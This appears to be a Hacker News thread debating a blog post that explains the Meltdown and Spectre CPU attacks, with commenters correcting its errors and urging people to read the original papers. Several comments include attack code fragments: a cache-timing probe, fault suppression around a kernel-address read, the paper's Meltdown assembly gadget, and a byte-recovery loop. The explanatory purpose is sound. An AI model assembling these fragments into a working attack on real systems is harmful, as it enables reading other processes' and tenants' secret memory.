https://meltdownattack.com/meltdown.pdf (start with this one)
They are extremely well written, clear and to the point. Understanding them will take you less time than trying to get rid of all the tortured analogies and unnecessary simplifications people have been trying to make up over the past week. It's bad enough that we face the daunting task of explaining this stuff to people who don't care about computers, there's no need to perpetuate misunderstanding among those who deal with computers for a living. Just read the real thing.
And on the subject of explaining this to others, it might surprise you how far you can get if you try to honestly explain how the attacks work. I refuse to use the silly train station metaphors, so I tried to describe the basic idea of how speculative execution works in out-of-order CPUs to my parents (who can browse the Internet, with some effort, and were patient enough to listen to me for 10 minutes or so). I don't think I got the notion of return-oriented programming across very well, but the basic idea of Meltdown and side-channel timing attacks in general is actually very easy to convey on the basis of a reasonably simplified picture of a CPU - you need to explain the basic role of cache memory, virtual vs physical addressing, the TLB and the basic notion of branch prediction. That's all you need to understand the principle of how the attacks work, if not the details of the implementation.
Point is: keldaris is exactly right; please do read these papers -- and read them in the order of Meltdown before Spectre. If you completely understand the Meltdown paper, the Spectre paper will be much more accessible.
How did the author of the blog post perpetuate a misunderstanding? What is wrong with reading multiple sources and discussions on a subject? Isn't that what we are doing here to some extent?
Because a definitive white paper was published, this should be our only allowed source of understanding?
It's quite possible that someone could read this and then the lengthier white paper and have them be complementary. Not every programmer starts with the same level of hardware and microarchitectural knowledge.
>"And on the subject of explaining this to others, it might surprise you how far you can get if you try to honestly explain how the attacks work."
Isn't this exactly what the author of this article did? In seeking to understand the problem, they formulated their understanding into a blog post.
It seems to me that's exactly what they did, and there were no "tortured analogies" in this individual's blog post.
By misunderstanding the fundamentals of how Meltdown works - specifically, by confusing out-of-order execution with speculative execution, and then basing their explanation on that misunderstanding. My further explanation elsewhere in this thread: https://news.ycombinator.com/item?id=16133668
I might have less of an understanding about the real world implications until I look at the impacts, but people around me have been talking about it (at work, etc) and I realized they all had a pretty limited understanding of the vulnerability and how it worked (not because they aren't smart, they just didn't have time to read the actual paper and are more focused on how this affects us at work).
I want to make this a part of my normal routine, every week or so to pick an interesting, well written paper on a meaningful CS topic and have a leisurely, scholarly read like I used to do in school (well, in school there wasn't too much leisure to it).
Similarly, many folks explaining this are likely doing so as much to increase their understanding as anything else. If there are problems in their explanation, help make it clearer.
None of this is to say that folks should skip the originals. But it is also not helpful to constantly send folks back to them.
This isn't something unattainably complicated that you need years of education (on top of a typical CS education or its self-taught equivalent) to understand. I think it's worth pointing out to people that they shouldn't be afraid of reading the original material. And frankly, I've found many of the popular metaphors harder to understand than the papers.
And again, I'm just cautioning if you are offhandedly dismissing metaphor. Tone can be lost in forums, obviously, so don't think I am "correcting" you. I do not intend it that way.
It's one thing to use a metaphor to convey some essential property of a complex idea to non-experts. It's quite another to see domain experts argue about the (often non-trivial) details of strained metaphors far beyond their area of applicability. Without demeaning the usefulness of metaphors, I'm essentially arguing that: 1) domain experts should be far more cognizant of the limitations of the metaphors they employ and 2) domain experts should at the very least try to read the original material before perpetuating solely metaphor-based explanations.
I agree the shared metaphors of notation and common jargon should be preferred as a starting point. I just don't have faith that they are the clear way out of misunderstanding. More, I think it is unrealistic to think this is something that should only be done with "outsiders". Rather, I think we are all using some common language, and shaking up to new language can shake out misunderstandings that were simply not being voiced.
On the other end of the scale, there are a huge number of popular documentaries out there that purport to say something about AdS/CFT. Most of them either contain nonsense or don't say very much at all. I don't really know how useful the popular analogies really are, but in the spirit of making at least one recommendation that doesn't contain any math, Susskind's public lectures are easy to watch (here's one), and Susskind is careful not to talk nonsense.
There isn't really much on AdS/CFT that's in between graduate level mathematics and math-less popular stuff. The reason is that it's a fairly irreducible concept in the sense that you really need to understand what an anti-de Sitter space is and how conformal field theories work to see why there's a mathematical correspondence between them, and this isn't truly analogous to anything simpler. That's why it's very hard to explain beyond the level of vague metaphors without being rigorous about it.
That is, these folks are building these metaphors as their attempt to understand the issues. If they simply kept them silently to themselves, you wouldn't even know they needed correcting. Be clear on this point: people think in these metaphors whether they are read to them or not. That you did not is a trait of yours, not a universal.
So, please correct them. And keep encouraging folks to go to the originals. But expect that not everyone can read them as clearly as you can. And use the evidence of the poor metaphors to confirm that. :)
Having the update at the post that says to read the original is vital. Getting more of the "peer review" mentality in all posts is also key, provided that people don't treat their posts as immutable and actually correct things that are in need of correcting.
I don't feel this is much different from any other pedagogical practice, though. How many of us come at "imaginary" numbers with a given metaphor that severely fails us in some understandings?
Once there's blood in the water, people race to find exploitable flaws (that's the goal of the game), and so it's not surprising that you'd get multiple teams disclosing, especially with something this egregious. Also: there's a Nyquist Frequency thing happening here: remember that we're dealing with months-long embargoes. So there's a lot of time for people to have found these bugs "separately", and all we're really seeing is a colliding disclosure.
But having said all that: straight-up collisions happen a lot. We all have favorite stories. My favorite is when Vitaly McLain (then at Matasano, now one of my partners at Latacora) found an nginx bug that was identical to Heartbleed, 2 years before Heartbleed was disclosed. A fantastic bug. We were on a client engagement, so we had to coordinate with the client before reporting it upstream, and in the one hour it took to do that, someone else reported the same bug.
I know you asked for specific citations, but I'd rather let someone who actually works in this area respond. I've read a few of the earlier articles on these subjects, but I'm not qualified to detail the full context surrounding the earlier research.
* The memory hierarchy (registers, cache, memory); really all programmers always need to know the memory hierarchy and Meltdown just sort of reinforces that.
* The basics of kernel memory management (kernel memory is mapped into userland processes and protected by page table permissions checks).
* Very basic assembly language (basically what a variable assignment and an "if" statement compile down to; see the sketch just after this list).
* The idea of pipelined CPUs, the idea that on modern CPUs the registers you see in assembly instructions are actually renamed from a larger invisible register file, and the distinction between instruction execution and retirement.
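For the assembly bullet, here's a tiny sketch of what I mean; the exact instructions depend entirely on the compiler and flags, so treat the assembly in the comments as a rough approximation rather than real output:

    int threshold_check(int x) {      /* hypothetical function */
        int y = x + 1;                /* assignment: roughly  lea eax, [rdi+1]        */
        if (y > 10)                   /* if:         roughly  cmp eax, 10 / jle .skip */
            return y * 2;             /*                      add eax, eax / ret      */
        return 0;                     /* .skip:               xor eax, eax / ret      */
    }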
If you've got this I think you can just read the paper: https://meltdownattack.com/meltdown.pdf. It's really well written. In particular: I don't think you need to understand much about timing attacks. The Flush+Reload paper (you can just Google it, it'll be the first result) is also really well written, but you'll be fine in the Meltdown paper without having read it.
What they're detecting is whether a piece of memory is in the cache or not. This lets them infer the contents of some other piece of memory.
For example, an if-statement might check whether or not a secret bit is set, and that might lead the process to call function A or function B. By detecting whether it's A or B that lands in the instruction cache, you can infer the value of the secret bit.
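If it helps to see the probing step in code, here's a rough Flush+Reload-style sketch in C. The threshold is an assumption; real attacks calibrate it per machine and repeat measurements to cope with noise:

    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

    #define THRESHOLD_CYCLES 120   /* assumed; must be calibrated per machine */

    /* Evict the line so that a later fast reload can only mean the victim touched it. */
    static void flush(void *addr) {
        _mm_clflush(addr);
    }

    /* Time a reload: a fast access means the address is in the cache. */
    static int was_cached(uint8_t *addr) {
        unsigned int aux;
        _mm_mfence();
        uint64_t start = __rdtscp(&aux);
        (void)*(volatile uint8_t *)addr;   /* the reload being timed */
        uint64_t end = __rdtscp(&aux);
        return (end - start) < THRESHOLD_CYCLES;
    }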
The nice thing about Meltdown and Spectre is that the cache hits are less tricky to understand; they're engineered specifically to make the exploit work.
I guess part of what bothered me is what makes it well written; so much of the discussion is spent on background, which felt like stating the obvious to me. It wasn't clear to me how specific the conditions needed to be for the attack. They use GnuPG as an example, and ostensibly rely on knowing beforehand the algorithms that the decryption and encryption functions use. With knowledge of the implementation, they're able to trace execution, and subsequently infer each bit of the victim data that they want to probe. They also need to know the victim's cache characteristics: hierarchy and timing.
It's a far cry from arbitrarily reading memory on an arbitrary victim.
Or does this work only because the kernel exists in the same virtual address space, hence KPTI as a mitigation?
And you are right, KPTI is a full fix for Meltdown (but not Spectre).
32 bit machines do not typically have sufficient kernel address space to do the same.
(Oh, Linux still uses a direct map on 32-bit machines even today, but only maps some memory? I thought that was abandoned, but wouldn't really know. Anyway, a much better explanation of all things direct map is https://www.sceen.net/mapping-physical-memory-directly/)
I am curious: what types of things does this simplify for the kernel? When is a physical page allocation ever done that doesn't need to be entered into a page table entry?
I wish I’d just read them in the first place. They aren’t that long and they aren’t that hard to follow. So I recommend developers read the original papers.
That said: after reading the papers trying to explain the issues to someone else will test your own understanding, so I don’t mean to dismiss what you’ve written.
Aside: I find “so you don’t have to” in the title to be a little off putting.
* I don't think Meltdown depends on eager (both-branch) speculative execution.
* Memory access during speculative execution almost has to work (and does on AMD and ARM), so that's not the problem. The problem is that permission checks on memory pages are done asynchronously on Intel, and may not abort execution until after footprints have been left in cache.
* You can't use memory writes to store the locations of transient memory reads because the instructions are transient, will never be retired, and so can't affect the architectural state (things overtly visible to programs). It's not that the CPU designers realized and specifically prevented that line of attack from working.
* It's not that cache state doesn't seem to be rolled back; it's that you can't roll it back. Modern computers are themselves small distributed systems. Changes on shared caches have to be coordinated. You'd be trading one race condition for another.
* Exception suppression isn't strictly necessary for the attack; without it your process just crashes. That's fine: you just run more processes. It might not be necessary to suppress exceptions at all, except that exception handling adds overhead and thus noise to your measurements. Also: the suppression technique you describe here is an oversimplification of Spectre; in reality, Meltdown deals with this with signal handlers or (probably better still) TSX.
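For anyone curious what "deals with this with signal handlers" looks like, here's a minimal sketch (the kernel-half address is purely illustrative, and the probing step is omitted):

    #include <setjmp.h>
    #include <signal.h>
    #include <stdio.h>

    static sigjmp_buf env;

    static void on_segv(int sig) {
        (void)sig;
        siglongjmp(env, 1);   /* skip past the faulting access instead of dying */
    }

    int main(void) {
        signal(SIGSEGV, on_segv);
        if (sigsetjmp(env, 1) == 0) {
            /* Illustrative kernel-space address: this read faults. In the real
               attack, the transient instructions following it would already have
               touched the probe array before the fault is delivered. */
            (void)*(volatile char *)0xffff800000000000ULL;
        }
        puts("process survived; now time the probe array");
        return 0;
    }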
Finally: I'd recommend not telling people to avoid the actual paper. Your summary is about as technical as Meltdown's is anyways. It's a great paper; more people should read it.
I think you are being overly gentle responding to this flaw in the explanation. Not only does the bug not depend on both-branch speculative execution, I don't think there even exist any x64 processors that do both-branch speculative execution.
I'm almost certain that all modern Intel x64 processors do branch-prediction and speculatively execute only the branch that they predict as most likely. If that guess is later proved wrong, they throw away the executed but not-yet-retired instructions and execute the correct path.
Am I wrong about this?
The article states differently. If I'm right, that would also require some Spectre-like attack to make sure the desired branch is actually executed speculatively. Alternatively, maybe you can catch the exception and use that to indicate the desired branch was run.
One of the biggest challenges in describing low-level systems vulnerabilities like these is that you have to actually learn at least a little about the CPU internals, and high-level explanations only get you so far. I think adding a "why this matters" to your post is helpful.
Planning to read the Spectre paper next week and do another blog post.
Edit: Just read your blog post, definitely need to add a "what's this about", and a "what you should do" section.
"The one which is being read is cached, and the exception will be raised much faster as a result."
I only read the Project Zero post, not the paper, but I don't recall it having anything to do with the timing of exceptions. I don't see the point or relevance of this section.
Might be missing something.
Edit: mixed up Meltdown with Spectre, I'll take a closer look at this later
You run your moderately protected VM on a cloud provider? So do I. In fact, mine runs on the same hardware as yours ... Nice private key you had there...
And we haven't seen a real-world binary version either. The versions I've seen all take running starts, so to speak.
So how early does that chain of events have to be stopped? If it's stopped before the unwanted fetch, security is sound - the CPU never pulls in the data it shouldn't see. Future CPU designs are probably going to have to do that, even at some cost in performance (but look for complicated explanations from Intel as to why this isn't really necessary). That may require more permission info in the various tables and caches of the memory system.
Even if the memory interface looks at page permissions earlier, there's the possibility of using this attack to peek at data in the same address space, data protected only by checks in the code. This may allow snooping around within application programs such as browsers.
It used to be that you only worried about timing issues from speculative execution in crypto code. It's important that strong encryption code take constant time regardless of the data. Otherwise, timing measurements of known-plaintext attacks may yield info about the key. Now it's a broader problem.
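The canonical example of the constant-time point, as a sketch: the first version leaks how many leading bytes matched through its running time, while the second does the same amount of work regardless of the data.

    #include <stddef.h>
    #include <stdint.h>

    /* Early-exit comparison: running time depends on the secret data. */
    int leaky_compare(const uint8_t *a, const uint8_t *b, size_t n) {
        for (size_t i = 0; i < n; i++)
            if (a[i] != b[i]) return 0;
        return 1;
    }

    /* Constant-time comparison: always touches every byte. */
    int constant_time_compare(const uint8_t *a, const uint8_t *b, size_t n) {
        uint8_t diff = 0;
        for (size_t i = 0; i < n; i++)
            diff |= a[i] ^ b[i];
        return diff == 0;
    }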
Bleah. Fortunately, my CPU designer friends are all retired now and don't have to deal with this.
Somewhat related: is it possible to neuter the JS engines in Firefox or Chrome so that they don't JIT JS, and would doing so have any real-world impact on mitigating this attack? If it relies on speedy execution to be possible, maybe a solution would be to have a NeuterScript extension that deliberately slows things down.
I think the point is that a JS-based attack, while possible, wouldn't be much use outside a proof of concept.
"In practice, CPUs supporting out-of-order execution support running operations speculatively to the extent that the processor’s out-of-order logic processes instructions before the CPU is certain whether the instruction will be needed and committed. In this paper, we refer to speculative execution in a more restricted meaning, where it refers to an instruction sequence following a branch, and use the term out-of-order execution to refer to any way of getting an operation executed before the processor has committed the results of all prior instructions."
In this explanation, the author starts by showing two different code branches, which is misleading. Meltdown does not require code branches - which is what makes it so surprising. This is the C code example from the paper:

    raise_exception();
    // the line below is never reached
    access(probe_array[data * 4096]);

No branches: you have an exception, and then in the code following that exception, you have some memory access. Despite the exception, the access happens because of out-of-order execution. The actual exploit is, in assembly:

    ; rcx = kernel address
    ; rbx = probe array
    retry:
      mov al, byte [rcx]
      shl rax, 0xc
      jz retry
      mov rbx, qword [rbx + rax]

The exception is raised on the mov command, as it loads a kernel address. This exception will eventually cause the processor to abandon all of the current code it is executing, and the program will terminate from a segmentation fault. But. There is a race condition: before the processor deals with the exception, but after the memory has been accessed, the second mov instruction executes, which uses the data which caused the exception. This shouldn't matter, as execution is abandoned, but data is brought into the cache based on this value, and using side-channel attacks, we can figure out what this value was. From the paper:
"To load data from the main memory into a register, the data in the main memory is referenced using a virtual address. In parallel to translating a virtual address into a physical address, the CPU also checks the permission bits of the virtual address, i.e., whether this virtual address is user accessible or only accessible by the kernel. As already discussed in Section 2.2, this hardware-based isolation through a permission bit is considered secure and recommended by the hardware vendors. Hence, modern operating systems always map the entire kernel into the virtual address space of every user process.
As a consequence, all kernel addresses lead to a valid physical address when translating them, and the CPU can access the content of such addresses. The only difference to accessing a user space address is that the CPU raises an exception as the current permission level does not allow to access such an address. Hence, the user space cannot simply read the contents of such an address. However, Meltdown exploits the out-of-order execution of modern CPUs, which still executes instructions in the small time window between the illegal memory access and the raising of the exception."
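To round out the side-channel half of this, here's a rough sketch of the receiving end. This isn't the paper's code; the threshold is an assumed, machine-specific value, and the real attack calibrates it and retries when the measurement is noisy:

    #include <stdint.h>
    #include <x86intrin.h>   /* __rdtscp */

    #define PAGE      4096
    #define THRESHOLD 120    /* assumed; calibrate per machine */

    /* After the transient access pulled probe_array[secret * 4096] into the
       cache, scan all 256 candidate pages and see which one reloads fast. */
    static int recover_byte(uint8_t *probe_array) {
        for (int guess = 0; guess < 256; guess++) {
            unsigned int aux;
            uint8_t *p = probe_array + guess * PAGE;
            uint64_t t0 = __rdtscp(&aux);
            (void)*(volatile uint8_t *)p;
            uint64_t t1 = __rdtscp(&aux);
            if (t1 - t0 < THRESHOLD)
                return guess;          /* cached page: guess == secret byte */
        }
        return -1;                     /* nothing cached: retry the attempt */
    }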
I find the paper to be very readable. They give a good overview of modern computer architecture, and then walk through all of the steps of their attack. I highly recommend reading it: https://meltdownattack.com/meltdown.pdf
For others on this thread: +1 on the above recommendation for reading the paper itself. It is very well written and accessible. If you've read the blog post, you know pretty much everything you need to understand the paper.
And, to reiterate: any explanation of Meltdown that depends on branches is incorrect. It's not enough to just use the phrase "out-of-order". All of your examples with if-statements need to change.
But more important than the term is that the submitted description explains the Meltdown attack in terms of branch instructions, which is not how it works. A reader of the submitted description will come away with an incorrect understanding of what actually happens.
If you wrote a VM with a CPU simulation, you would implement it as a branch.
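To make that concrete, here's a toy sketch (everything here is made up for illustration, not how any real emulator is structured): in software, the permission check is an ordinary branch evaluated before the load, so the forbidden byte is simply never read.

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    struct fake_pte { bool present; bool user_ok; uint32_t phys; };

    static uint8_t emulated_ram[1 << 16];
    static bool    fault_pending;

    /* Toy page-table walk: the top half of the address space is kernel-only. */
    static struct fake_pte lookup(uint32_t vaddr) {
        struct fake_pte pte = { true, vaddr < 0x8000, vaddr };
        return pte;
    }

    static uint8_t emulated_user_load(uint32_t vaddr) {
        struct fake_pte pte = lookup(vaddr);
        if (!pte.present || !pte.user_ok) {   /* the branch: check first...  */
            fault_pending = true;             /* deliver the emulated #PF    */
            return 0;
        }
        return emulated_ram[pte.phys];        /* ...and load only if allowed */
    }

    int main(void) {
        emulated_ram[0x9000] = 0x42;          /* "kernel" secret */
        uint8_t v = emulated_user_load(0x9000);
        printf("value=%d fault=%d\n", v, fault_pending);   /* value=0 fault=1 */
        return 0;
    }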
That should be 256 bytes.
Should probably say "Intel" somewhere ;)
Was this simply a performance engineering trade off made by Intel? Would checking the PTE permissions on speculative execution result in giving up any performance gained by the speculative execution?
My new understanding is now that the concept of a process and isolation of processes is handled by the kernel.
This is probably a silly question, but maybe we could handle process isolation in the CPU somehow?
Basic Bayesian analysis suggests that there is more fruit to fall off the tree.
Nice read anyway.